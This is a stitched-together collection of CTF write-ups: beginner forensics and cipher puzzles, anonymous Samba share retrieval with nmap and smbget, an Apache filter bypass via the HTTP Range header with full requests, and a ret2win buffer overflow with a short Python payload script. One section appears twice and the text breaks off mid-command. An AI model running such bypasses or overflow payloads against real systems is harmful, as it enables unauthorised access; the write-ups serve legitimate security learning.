7"abi-note.c__abi_taginit.ccrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrycalc.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTable_edata__stack_chk_fail@@GLIBC_2.4printf@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmain__isoc99_scanf@@GLIBC_2.7__TMC_END___ITM_registerTMCloneTable__cxa_finalize@@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.got.plt.data.bss.comment�#��$6�� D�N�o� �� � 4�!!������=�-��?��@�0@0@@@�0@0X0`5��� �6S```This is only part of the file but it gives us an idea but is not an easy way to read and doesn't really give us any clues. Having read it with cat, we notice that it gives us a mix of human and other character types. With the title hinting towards the 'strings' command. Let's give that a go. From the man page:*_strings_ is mainly useful for determining the contents of non-text files. ... _strings_(1) - Linux man page. Name. strings- print the strings of printable characters in files.* ```shell~/Downloads$ strings calc/lib64/ld-linux-x86-64.so.2__isoc99_scanf__stack_chk_failprintf__cxa_finalize__libc_start_mainlibc.so.6GLIBC_2.7GLIBC_2.2.5GLIBC_2.4_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableu3UH[]A\A]A^A_Enter an operator (+, -, *,): Enter two operands: %lf %lf%.1lf + %.1lf = %.1lf%.1lf - %.1lf = %.1lf%.1lf * %.1lf = %.1lf%.1lf / %.1lf = %.1lfError! operator is not correct``` Now that is easier to read as it is by line. However there are 87 lines to look through and the types of file can contain thousands of lines. What we can use is a command that will help us look for patterns. In this case 'grep'Again utilising the man page:*The _grep_ utility shall search the input files, selecting lines matching one or more patterns; the types of patterns are controlled by the options specified.* OK Can we just 'grep' the file calc? Yes we could and it would give us the same answer. But since we have already used 'strings', lets take that output and put it into 'grep'. To do this in Linux, we 'pipe' it from one command into another.*strings | grep* One more thing. Now grep is used to find patterns but we need to give it some options. Generally we know the CTF flag stype and in this case it is utflag{} with words between the brackets. That being the case we can ask 'grep' to search for this pattern and if we generalise the characters withing it (i.e. search for anything in there) then we should be able to print off the flag. ```shell~/Downloads$ strings calc | grep -oE utflag{.?*}utflag{strings_is_op}```- -o, --only-matching (show only nonempty parts of lines that match)- -E, --extended-regexp (PATTERNS are extended regular expressions) As I mentioned we can do this to the file so the command is still the same, less strings but adding the file name.```shell~/Downloads$ grep -oEa utflag{.?*} calc utflag{strings_is_op}``` And finally we can actually use 'cat'. The only difference is that his time, we need to tell 'grep' that we are reading as text.```shell~/Downloads$ cat calc | grep -oE utflag{.?*}Binary file (standard input) matches```Here without -a it tells us it finds a match in a binary file.```~/Downloads$ cat calc | grep -oEa utflag{.?*}utflag{strings_is_op}``` Adding the additional option of -a now finds the flag. - -a, --text (equivalent to --binary-files=text) ### HTMLDescription:*I hid a flag somewhere in the code of the UTCTF website, can you find it?* We get a link to the website. https://www.isss.io/utctf/ Lets look at the source code and bang!! We have the flag. ![](./images/utctf001a.png) utflag{you_found_me_0123959} ### Magic BytesDescription:*My friend sent me this text file and said they put a flag inside. I opened it and it doesn't look like a normal text file to me! Maybe you'll be able to find it.* We get a .txt file. Again lets check it out with 'file' ```shell~/Downloads$ file out.txt out.txt: PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced``` OK now we know it is a png file, lets use the default image viewer Eye of Gnome to check out the file ```shell~/Downloads$ eog out.txt``` ![](./images/utctf001b.png) Now we have the flag.utflag{file_extensions_mean_nothing} ### Run ElfDescription:*Anyone know how to run an ELF file? I bet you could figure it out.* We get a run file. Again lets check it out with 'file'```shell~/Downloads$ file runrun: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e29057709baef974009b1e676fd113ed20f1942f, for GNU/Linux 3.2.0, not stripped```Lets check to see what the file permissions are with 'ls'```shell~/Downloads$ ls -l run-rw-rw-r-- 1 jim jim 16600 Mar 13 07:56 run```OK So we see it is not an executable file. Lets make it so.```~/Downloads$ chmod +x run ~/Downloads$ ls -l run-rwxrwxr-x 1 jim jim 16600 Mar 13 07:56 run``` We can now see the executable bit in place. SO to run the file we do it within the current folder.```shell~/Downloads$ ./runutflag{run_run_binary_9312854}``` We now get the flag. utflag{run_run_binary_9312854} ### Cipher GauntletDescription:*Can you make it through all of the encodings and ciphers?* We get a text file. Again lets check it out with 'cat'```shell/Downloads$ cat secret.txt 01010101 01101000 00101101 01101111 01101000 00101100 00100000 01101100 01101111 01101111 01101011 01110011 00100000 01101100 01101001 01101011 01100101 00100000 01110111 01100101 00100000 01101000 01100001 01110110 01100101 00100000 01100001 01101110 01101111 01110100 01101000 01100101 01110010 00100000 01100010 01101100 01101111 01100011 01101011 00100000 01101111 01100110 00100000 01110100 01100101 01111000 01110100 00101100 00100000 01110111 01101001 01110100 01101000 00100000 01110011 01101111``` OK there is a lot of what appears to be binary code. With it being a challenge with a lot of codes and ciphers, lets upload the file to GCHQ's CyberChef. This will allow us to add a number of sections to 'bake' a solution. Right lets try binary first. We get a new selection of text with some instructions. ```Uh-oh, looks like we have another block of text, with some sort of special encoding. Can you figure out what this encoding is? (hint: if you look carefully, you'll notice that there only characters present are A-Z, a-z, 0-9, and sometimes / and +. See if you can find an encoding that looks like this one.)TmV3IGNoYWxsZW5nZSEgQ2FuIHlvdSBmaWd1cmUgb3V0IHdoYXQncyBnb2luZyBvbiBoZXJlPyBJdCBsb29rcyBsaWtlIHRoZSBsZXR0ZXJzIGFyZSBzaGlmdGVkIGJ5IHNvbWUgY29uc3RhbnQuIChoaW50OiB5b3UgbWlnaHQgd2FudCB0byBzdGFydCBsb29raW5nIHVwIFJvbWFuIHBlb3BsZSkuCm15eHFia2Rldmtkc3l4YyEgaXllIHJrZm8gcHN4c2Nyb24gZHJvIGxvcXN4eG9iIG1iaXpkeXFia3pyaSBtcmt2dm94cW8uIHJvYm8gc2MgayBwdmtxIHB5YiBrdnYgaXllYiBya2JuIG9wcHliZGM6IGVkcHZrcXt4eWdfaXllYm9fenZraXN4cV9nc2RyX21iaXpkeX0uIGl5ZSBnc3Z2IHBzeG4gZHJrZCBrIHZ5ZCB5cCBtYml6ZHlxYmt6cmkgc2MgbGVzdm5zeHEgeXBwIGRyc2MgY3liZCB5cCBsa2NzbSB1eHlndm9ucW8sIGt4biBzZCBib2t2dmkgc2MgeHlkIGN5IGxrbiBrcGRvYiBrdnYuIHJ5em8gaXllIG94dHlpb24gZHJvIG1ya3Z2b3hxbyE=``` The spacer at the end of the code indicates that it might be Base64. Lets try that in Cyberchef.```New challenge! Can you figure out what's going on here? It looks like the letters are shifted by some constant. (hint: you might want to start looking up Roman people).myxqbkdevkdsyxc! iye rkfo psxscron dro loqsxxob mbizdyqbkzri mrkvvoxqo. robo sc k pvkq pyb kvv iyeb rkbn oppybdc: edpvkq{xyg_iyebo_zvkisxq_gsdr_mbizdy}. iye gsvv psxn drkd k vyd yp mbizdyqbkzri sc lesvnsxq ypp drsc cybd yp lkcsm uxygvonqo, kxn sd bokvvi sc xyd cy lkn kpdob kvv. ryzo iye oxtyion dro mrkvvoxqo!``` The hint here relates to Romans. They used to use a Caesar Cipher which is a rotating cipher. In CyberChef they call this ROT13. Lets try that.```zlkdoxqrixqflkp! vlr exsb cfkfpeba qeb ybdfkkbo zovmqldoxmev zexiibkdb. ebob fp x cixd clo xii vlro exoa bccloqp: rqcixd{klt_vlrob_mixvfkd_tfqe_zovmql}. vlr tfii cfka qexq x ilq lc zovmqldoxmev fp yrfiafkd lcc qefp ploq lc yxpfz hkltibadb, xka fq obxiiv fp klq pl yxa xcqbo xii. elmb vlr bkglvba qeb zexiibkdb!```So even though it is ROT13, we still can't read the file. However the hint says it is shifted, so we have an option to change this. Click on the updown arrows to shift by one each time and watch the code change. When youhit shift 16, we have the final flag.```congratulations! you have finished the beginner cryptography challenge. here is a flag for all your hard efforts: utflag{now_youre_playing_with_crypto}. you will find that a lot of cryptography is building off this sort of basic knowledge, and it really is not so bad after all. hope you enjoyed the challenge!``` The flag utflag{now_youre_playing_with_crypto} ### Sizzling BaconDescription:*My buddy Francis is _really_ into Bacon. He loves it so much that he gave me this encoded bacon-themed flag (he said he was inspired by the sound of sizzling bacon).* We get a text string. *sSsSSsSSssSSsSsSsSssSSSSSSSssS{SSSsSsSSSsSsSSSsSSsSSssssssSSSSSSSsSSSSSSSSsSSsssSSssSsSSSsSSsSSSSssssSSsssSSsSSsSSSs}* Bacon is highlighted a number of times. If we do a search for bacon and cipher, we find that it does exist. From wikipedia:*Bacon's cipher or the Baconian cipher is a method of steganographic message encoding devised by Francis Bacon in 1605. A message is concealed in the presentation of text, rather than its content.* We can use CyberChef again. Simply search for Bacon and it brings up the Bacon Cipher Decode Operation. Play about with the options:- Alphabet (Complete)- Translation (Case) And we get the flag:UTFLAGCRISPYBACONCIPHERAmend it with braces and #boom, the next flag. UTFLAG{CRISPYBACONCIPHER}
## networking ### Be My GuestDescription:*Can you share some secrets about this box?* nmap is allowed for this problem. However, you may only target 'misc.utctf.live ports 8881 & 8882.' Thank you. Not familiar with these types of challenges because it's been easier to ignore them!! but once I got the hang of using nmap with the specifics they provided, my confidence shot up. After all I've been using these tools for some time. So lets get that nmap out the way.```shell~$ nmap -sC -sV misc.utctf.live -p8881-8882Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-14 19:33 GMTNmap scan report for misc.utctf.live (3.236.87.2)Host is up (0.080s latency).rDNS record for 3.236.87.2: ec2-3-236-87-2.compute-1.amazonaws.com PORT STATE SERVICE VERSION8881/tcp open netbios-ssn Samba smbd 4.6.28882/tcp open netbios-ssn Samba smbd 4.6.2 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 60.86 seconds ```OK, so I see that both are Samba ports. I initially thought of smbclient. ```shell~$ smbclient -L \\anonymous -I misc.utctf.live -p8881Enter WORKGROUP\kartibok's password: Sharename Type Comment --------- ---- ------- guest Disk Look, but don't touch please. IPC$ IPC IPC Service (Samba Server)SMB1 disabled -- no workgroup available~$ smbclient -L \\anonymous -I misc.utctf.live -p8882Enter WORKGROUP\kartibok's password: Sharename Type Comment --------- ---- ------- guest Disk Look, but don't touch please. IPC$ IPC IPC Service (Samba Server)SMB1 disabled -- no workgroup available:~$ ```So that is not available. Next I thought about 'smbget'. I created a folder to store any data, then ran the 'smbget' ```shell~$ mkdir samba~$ cd samba/~/samba$ smbget -R smb://misc.utctf.live:8881/Password for [kartibok] connecting to //IPC$/misc.utctf.live: Using workgroup WORKGROUP, user kartiboksmb://misc.utctf.live:8881//guest/flag.txt Ignoring ipc$ share IPC$Downloaded 30b in 5 seconds```Let's see what we have downloaded```~/samba$ lsguest~/samba$ cd guest/~/samba/guest$ lsflag.txt~/samba/guest$ cat flag.txt utflag{gu3st_p4ss_4_3v3ry0n3}```Flagutflag{gu3st_p4ss_4_3v3ry0n3}
# ASIS CTF Finals 2020 – Less secure secrets * **Category:** web* **Points:** 71 ## Challenge > Let's warm up!> > https://securesecrets.asisctf.com/ ## Solution The website shows a page like the following. ```html<html> <head> <title>Secret protector</title> <link href="https://fonts.googleapis.com/css2?family=Chilanka&display=swap" rel="stylesheet"> <style> body{ background-color: #262428; } .title-protection{ font-family: "Chilanka"; font-size: 40px; font-weight: bold; color: white; width: 100%; text-align: center; height: 400px; line-height: 400px; } iframe{ width: 400px; height: 300px; margin-top: -50px; } .frame-holder{ text-align: center; width: 100%; } </style> </head> <body> <div> <div class="title-protection"> Apache powered secret protection. Secure your secrets, with our sample configs. </div> <div class="frame-holder"> <iframe src="/secret.html"> </iframe> </div> <div> </div> </div> </body></html>``` You can discover the [configs.zip](https://github.com/m3ssap0/CTF-Writeups/raw/master/ASIS%20CTF%20Finals%202020/Less%20secure%20secrets/configs.zip) file with configurations. Analyzing [`configs/config/proxy/apache_ctf.conf`](https://github.com/m3ssap0/CTF-Writeups/raw/master/ASIS%20CTF%20Finals%202020/Less%20secure%20secrets/configs/config/proxy/apache_ctf.conf) file, you can find a rule that substitute a `secret` tag. ```ServerName proxy LoadModule deflate_module /usr/local/apache2/modules/mod_deflate.soLoadModule proxy_module /usr/local/apache2/modules/mod_proxy.soLoadModule substitute_module /usr/local/apache2/modules/mod_substitute.soLoadModule proxy_http_module /usr/local/apache2/modules/mod_proxy_http.so <VirtualHost *:80> RequestHeader unset Accept-Encoding ProxyPass / http://main/ ProxyPassReverse / http://main/ SetEnvIf X-Http-Method-Override ".+" X-Http-Method-Override=$0 RequestHeader set X-Http-Method-Override %{X-Http-Method-Override}e env=X-Http-Method-Override SetEnvIf Range ".+" Range=$0 RequestHeader set Range %{Range}e env=Range SetEnvIf Via ".+" Via=$0 RequestHeader set Via %{Via}e env=Via SetEnvIf If-Match ".+" If-Match=$0 RequestHeader set If-Match %{If-Match}e env=If-Match <if "%{REMOTE_ADDR} != '127.0.0.1'"> AddOutputFilterByType INFLATE;SUBSTITUTE;DEFLATE text/html Substitute s|<secret>(.*)</secret>|Protected|i </if> # Send apache logs to stdout and stderr CustomLog /proc/self/fd/1 common ErrorLog /proc/self/fd/2</VirtualHost>``` So if you try to read `secret.html` page you will obtain the content with the substitution applied. ```GET /secret.html HTTP/1.1Host: securesecrets.asisctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://securesecrets.asisctf.com/Connection: close HTTP/1.1 200 OKdate: Fri, 11 Dec 2020 23:23:18 GMTserver: Apache/2.4.46 (Unix)last-modified: Fri, 11 Dec 2020 14:56:25 GMTetag: "36b-5b6317f19aaf3"accept-ranges: bytescontent-type: text/htmlvary: Accept-Encodingconnection: closeContent-Length: 792 <html> <head> <title>very secure key</title> <link href="https://fonts.googleapis.com/css2?family=Chilanka&display=swap" rel="stylesheet"> <style> body{ background-color: #2e2e2e; } .title-protection{ font-family: "Chilanka"; font-size: 20px; font-weight: bold; color: white; width: 100%; padding: 40px 100px; box-sizing: border-box; text-align: center; height: 400px; } </style> </head> <body> <div> <div class="title-protection"> Protected </div> </div> </body></html>``` You can use the `Range` HTTP header to exfiltrate the original `secret.html` page. ```GET /secret.html HTTP/1.1Host: securesecrets.asisctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://securesecrets.asisctf.com/Connection: closeRange: bytes=0-1023 HTTP/1.1 206 Partial Contentdate: Fri, 11 Dec 2020 23:25:00 GMTserver: Apache/2.4.46 (Unix)last-modified: Fri, 11 Dec 2020 14:56:25 GMTetag: "36b-5b6317f19aaf3"accept-ranges: bytescontent-length: 875content-range: bytes 0-874/875content-type: text/htmlconnection: close <html> <head> <title>very secure key</title> <link href="https://fonts.googleapis.com/css2?family=Chilanka&display=swap" rel="stylesheet"> <style> body{ background-color: #2e2e2e; } .title-protection{ font-family: "Chilanka"; font-size: 20px; font-weight: bold; color: white; width: 100%; padding: 40px 100px; box-sizing: border-box; text-align: center; height: 400px; } </style> </head> <body> <div> <div class="title-protection"> <secret>What??? You want the first secret? I think it's "ASIS{L3T5_S74rT_7h3_fUn}".</secret> </div> </div> </body></html>``` The flag is the following. ```ASIS{L3T5_S74rT_7h3_fUn}```
# Warmups Here are all my solutions to the `warmups` category, except for `Eighth Circle` ## Veebee I use Windows, so I just ran it: ![not_easy](./not_easy.png) Just click through the second, and here we go: ![flag](./flag.png) Nice! ## Chicken wings We have this encoded flag:```♐●♋♑❀♏????♍♏⌛?♐??????♍????♌?♍?♋?♌♎♍?♏❝```This is wingdings and we can decode this [here](https://lingojam.com/WingDing):```flag{e0791ce68f718188c0378b1c0a3bdc9e}``` ## Shoelaces We have an image of shoelaces, I just ran `strings`, that's my instinct to check for a flag right away: ```strings shoelaces.jpg | grep flag flag{137288e960a3ae9b148e8a7db16a69b0}``` ## Car keys ```We found this note on someone's key chain! It reads... ygqa{6y980e0101e8qq361977eqe06508q3rt}? There was another key that was engraved with the word QWERTY, too...```So this is definitely a `QWERTY` shift, I used [this]():```foak{6f980c0101c8aa361977cac06508a3de}```Just fix the prefix```flag{6f980c0101c8aa361977cac06508a3de}``` ## Buzz ```You know, that sound that bumblebees make?``` They `zzzzzzzz`, just use `7z x` on the file:```7z x buzz 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,3 CPUs Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz (806EA),ASM,AES-NI) Scanning the drive for archives:1 file, 45 bytes (1 KiB) Extracting archive: buzz--Path = buzzType = Z Everything is Ok Size: 39Compressed: 45```And your flag is in the extracted files:```bashcat buzz~flag{b3a33db7ba04c4c9052ea06d9ff17869}``` ## Pollex We have an image:```? Download the file below.```I was too lazy to switch to my `Kali` VM and run `file` etc. So I just used this [exif tool](http://exif.regex.info/exif.cgi): ![pollex](./pollex.png) ## esab64 Try reconstructing it. `esab64` is kind of like `base64` isn't it?```python3Python 3.7.4 (default, Jul 11 2019, 10:43:21) [GCC 8.3.0] on linuxType "help", "copyright", "credits" or "license" for more information.>>> with open('esab64','rt') as file:... todebase = file.readlines()... >>> todebase['mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X']>>> todebase[0][::-1]'X31lNjFlNzExMTA2YmQwZGIxYjc4ZWZhODk0YjExMjViZntnYWxm'>>> import base64>>> base64.b64decode(todebase[0][::-1])b'_}e61e711106bd0db1b78efa894b1125bf{galf'>>> base64.b64decode(todebase[0][::-1])[::-1]b'flag{fb5211b498afe87b1bd0db601117e16e}_'```There it is :)
## beginner ### stringy thingsDescription:*I know there's a string in this binary somewhere.... Now where did I leave it?* We get a calc file. lets use the command 'file' to see what it actually is:```shell~/Downloads$ file calccalc: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=8be49a90c694a4f14dd0735d7ad2ffb200753cfb, for GNU/Linux 3.2.0, not stripped```So an ELF file is an executable in Linux. It gets generated after it has been through the complile and build process in an SDK (Software Development Kit) So generallty we can read all files in Linux so lets see what it shows us.```shell~/Downloads$ cat calc ELF>`@:@8 @@@@h����� ���-�=�=X`�-�=�=����DDP�td� � � 44Q�tdR�td�-�=�=/lib64/ld-linux-x86-64.so.2GNU�䚐Ɣ��M�s]z���u<�GNUs !7� � `� � !�=�=�=�?@0@@@��P��=�������!����=��=��=�� @�Y��@@ 7"abi-note.c__abi_taginit.ccrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrycalc.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTable_edata__stack_chk_fail@@GLIBC_2.4printf@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmain__isoc99_scanf@@GLIBC_2.7__TMC_END___ITM_registerTMCloneTable__cxa_finalize@@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.got.plt.data.bss.comment�#��$6�� D�N�o� �� � 4�!!������=�-��?��@�0@0@@@�0@0X0`5��� �6S```This is only part of the file but it gives us an idea but is not an easy way to read and doesn't really give us any clues. Having read it with cat, we notice that it gives us a mix of human and other character types. With the title hinting towards the 'strings' command. Let's give that a go. From the man page:*_strings_ is mainly useful for determining the contents of non-text files. ... _strings_(1) - Linux man page. Name. strings- print the strings of printable characters in files.* ```shell~/Downloads$ strings calc/lib64/ld-linux-x86-64.so.2__isoc99_scanf__stack_chk_failprintf__cxa_finalize__libc_start_mainlibc.so.6GLIBC_2.7GLIBC_2.2.5GLIBC_2.4_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableu3UH[]A\A]A^A_Enter an operator (+, -, *,): Enter two operands: %lf %lf%.1lf + %.1lf = %.1lf%.1lf - %.1lf = %.1lf%.1lf * %.1lf = %.1lf%.1lf / %.1lf = %.1lfError! operator is not correct``` Now that is easier to read as it is by line. However there are 87 lines to look through and the types of file can contain thousands of lines. What we can use is a command that will help us look for patterns. In this case 'grep'Again utilising the man page:*The _grep_ utility shall search the input files, selecting lines matching one or more patterns; the types of patterns are controlled by the options specified.* OK Can we just 'grep' the file calc? Yes we could and it would give us the same answer. But since we have already used 'strings', lets take that output and put it into 'grep'. To do this in Linux, we 'pipe' it from one command into another.*strings | grep* One more thing. Now grep is used to find patterns but we need to give it some options. Generally we know the CTF flag stype and in this case it is utflag{} with words between the brackets. That being the case we can ask 'grep' to search for this pattern and if we generalise the characters withing it (i.e. search for anything in there) then we should be able to print off the flag. ```shell~/Downloads$ strings calc | grep -oE utflag{.?*}utflag{strings_is_op}```- -o, --only-matching (show only nonempty parts of lines that match)- -E, --extended-regexp (PATTERNS are extended regular expressions) As I mentioned we can do this to the file so the command is still the same, less strings but adding the file name.```shell~/Downloads$ grep -oEa utflag{.?*} calc utflag{strings_is_op}``` And finally we can actually use 'cat'. The only difference is that his time, we need to tell 'grep' that we are reading as text.```shell~/Downloads$ cat calc | grep -oE utflag{.?*}Binary file (standard input) matches```Here without -a it tells us it finds a match in a binary file.```~/Downloads$ cat calc | grep -oEa utflag{.?*}utflag{strings_is_op}``` Adding the additional option of -a now finds the flag. - -a, --text (equivalent to --binary-files=text) ### HTMLDescription:*I hid a flag somewhere in the code of the UTCTF website, can you find it?* We get a link to the website. https://www.isss.io/utctf/ Lets look at the source code and bang!! We have the flag. ![](./images/utctf001a.png) utflag{you_found_me_0123959} ### Magic BytesDescription:*My friend sent me this text file and said they put a flag inside. I opened it and it doesn't look like a normal text file to me! Maybe you'll be able to find it.* We get a .txt file. Again lets check it out with 'file' ```shell~/Downloads$ file out.txt out.txt: PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced``` OK now we know it is a png file, lets use the default image viewer Eye of Gnome to check out the file ```shell~/Downloads$ eog out.txt``` ![](./images/utctf001b.png) Now we have the flag.utflag{file_extensions_mean_nothing} ### Run ElfDescription:*Anyone know how to run an ELF file? I bet you could figure it out.* We get a run file. Again lets check it out with 'file'```shell~/Downloads$ file runrun: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e29057709baef974009b1e676fd113ed20f1942f, for GNU/Linux 3.2.0, not stripped```Lets check to see what the file permissions are with 'ls'```shell~/Downloads$ ls -l run-rw-rw-r-- 1 jim jim 16600 Mar 13 07:56 run```OK So we see it is not an executable file. Lets make it so.```~/Downloads$ chmod +x run ~/Downloads$ ls -l run-rwxrwxr-x 1 jim jim 16600 Mar 13 07:56 run``` We can now see the executable bit in place. SO to run the file we do it within the current folder.```shell~/Downloads$ ./runutflag{run_run_binary_9312854}``` We now get the flag. utflag{run_run_binary_9312854} ### Cipher GauntletDescription:*Can you make it through all of the encodings and ciphers?* We get a text file. Again lets check it out with 'cat'```shell/Downloads$ cat secret.txt 01010101 01101000 00101101 01101111 01101000 00101100 00100000 01101100 01101111 01101111 01101011 01110011 00100000 01101100 01101001 01101011 01100101 00100000 01110111 01100101 00100000 01101000 01100001 01110110 01100101 00100000 01100001 01101110 01101111 01110100 01101000 01100101 01110010 00100000 01100010 01101100 01101111 01100011 01101011 00100000 01101111 01100110 00100000 01110100 01100101 01111000 01110100 00101100 00100000 01110111 01101001 01110100 01101000 00100000 01110011 01101111``` OK there is a lot of what appears to be binary code. With it being a challenge with a lot of codes and ciphers, lets upload the file to GCHQ's CyberChef. This will allow us to add a number of sections to 'bake' a solution. Right lets try binary first. We get a new selection of text with some instructions. ```Uh-oh, looks like we have another block of text, with some sort of special encoding. Can you figure out what this encoding is? (hint: if you look carefully, you'll notice that there only characters present are A-Z, a-z, 0-9, and sometimes / and +. See if you can find an encoding that looks like this one.)TmV3IGNoYWxsZW5nZSEgQ2FuIHlvdSBmaWd1cmUgb3V0IHdoYXQncyBnb2luZyBvbiBoZXJlPyBJdCBsb29rcyBsaWtlIHRoZSBsZXR0ZXJzIGFyZSBzaGlmdGVkIGJ5IHNvbWUgY29uc3RhbnQuIChoaW50OiB5b3UgbWlnaHQgd2FudCB0byBzdGFydCBsb29raW5nIHVwIFJvbWFuIHBlb3BsZSkuCm15eHFia2Rldmtkc3l4YyEgaXllIHJrZm8gcHN4c2Nyb24gZHJvIGxvcXN4eG9iIG1iaXpkeXFia3pyaSBtcmt2dm94cW8uIHJvYm8gc2MgayBwdmtxIHB5YiBrdnYgaXllYiBya2JuIG9wcHliZGM6IGVkcHZrcXt4eWdfaXllYm9fenZraXN4cV9nc2RyX21iaXpkeX0uIGl5ZSBnc3Z2IHBzeG4gZHJrZCBrIHZ5ZCB5cCBtYml6ZHlxYmt6cmkgc2MgbGVzdm5zeHEgeXBwIGRyc2MgY3liZCB5cCBsa2NzbSB1eHlndm9ucW8sIGt4biBzZCBib2t2dmkgc2MgeHlkIGN5IGxrbiBrcGRvYiBrdnYuIHJ5em8gaXllIG94dHlpb24gZHJvIG1ya3Z2b3hxbyE=``` The spacer at the end of the code indicates that it might be Base64. Lets try that in Cyberchef.```New challenge! Can you figure out what's going on here? It looks like the letters are shifted by some constant. (hint: you might want to start looking up Roman people).myxqbkdevkdsyxc! iye rkfo psxscron dro loqsxxob mbizdyqbkzri mrkvvoxqo. robo sc k pvkq pyb kvv iyeb rkbn oppybdc: edpvkq{xyg_iyebo_zvkisxq_gsdr_mbizdy}. iye gsvv psxn drkd k vyd yp mbizdyqbkzri sc lesvnsxq ypp drsc cybd yp lkcsm uxygvonqo, kxn sd bokvvi sc xyd cy lkn kpdob kvv. ryzo iye oxtyion dro mrkvvoxqo!``` The hint here relates to Romans. They used to use a Caesar Cipher which is a rotating cipher. In CyberChef they call this ROT13. Lets try that.```zlkdoxqrixqflkp! vlr exsb cfkfpeba qeb ybdfkkbo zovmqldoxmev zexiibkdb. ebob fp x cixd clo xii vlro exoa bccloqp: rqcixd{klt_vlrob_mixvfkd_tfqe_zovmql}. vlr tfii cfka qexq x ilq lc zovmqldoxmev fp yrfiafkd lcc qefp ploq lc yxpfz hkltibadb, xka fq obxiiv fp klq pl yxa xcqbo xii. elmb vlr bkglvba qeb zexiibkdb!```So even though it is ROT13, we still can't read the file. However the hint says it is shifted, so we have an option to change this. Click on the updown arrows to shift by one each time and watch the code change. When youhit shift 16, we have the final flag.```congratulations! you have finished the beginner cryptography challenge. here is a flag for all your hard efforts: utflag{now_youre_playing_with_crypto}. you will find that a lot of cryptography is building off this sort of basic knowledge, and it really is not so bad after all. hope you enjoyed the challenge!``` The flag utflag{now_youre_playing_with_crypto} ### Sizzling BaconDescription:*My buddy Francis is _really_ into Bacon. He loves it so much that he gave me this encoded bacon-themed flag (he said he was inspired by the sound of sizzling bacon).* We get a text string. *sSsSSsSSssSSsSsSsSssSSSSSSSssS{SSSsSsSSSsSsSSSsSSsSSssssssSSSSSSSsSSSSSSSSsSSsssSSssSsSSSsSSsSSSSssssSSsssSSsSSsSSSs}* Bacon is highlighted a number of times. If we do a search for bacon and cipher, we find that it does exist. From wikipedia:*Bacon's cipher or the Baconian cipher is a method of steganographic message encoding devised by Francis Bacon in 1605. A message is concealed in the presentation of text, rather than its content.* We can use CyberChef again. Simply search for Bacon and it brings up the Bacon Cipher Decode Operation. Play about with the options:- Alphabet (Complete)- Translation (Case) And we get the flag:UTFLAGCRISPYBACONCIPHERAmend it with braces and #boom, the next flag. UTFLAG{CRISPYBACONCIPHER}
### Basic Return Oriented Programming Buffer Overflow This challenge was a very basic pwn challenge in which what we had to do was find the offset at which the Buffer Overflow occured and then re write the EIP with the Address of the win function. The address of the win function can be found like so : ```bash./gdb ./ret2basicgdb-peda$ info functionsAll defined functions:Non-debugging symbols:<REDACTED>0x00000000004011e6 setup0x0000000000401215 win0x000000000040130f vuln<REDACTED> ``` And to find the buffer overflow we can use GDB as well :```gdb-peda$ pattern_create 200 gdb-peda$ r Can you overflow this?: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA# After this do pattern_search and we will get the offset at 120```After getting the Offset we can easily write a script to exploit it ```pythonpadding = "\x15\x12\x40\x00\x00\x00\x00\x00"payload = "a" * 120 print(payload + padding)```and then ```python exploit.py > 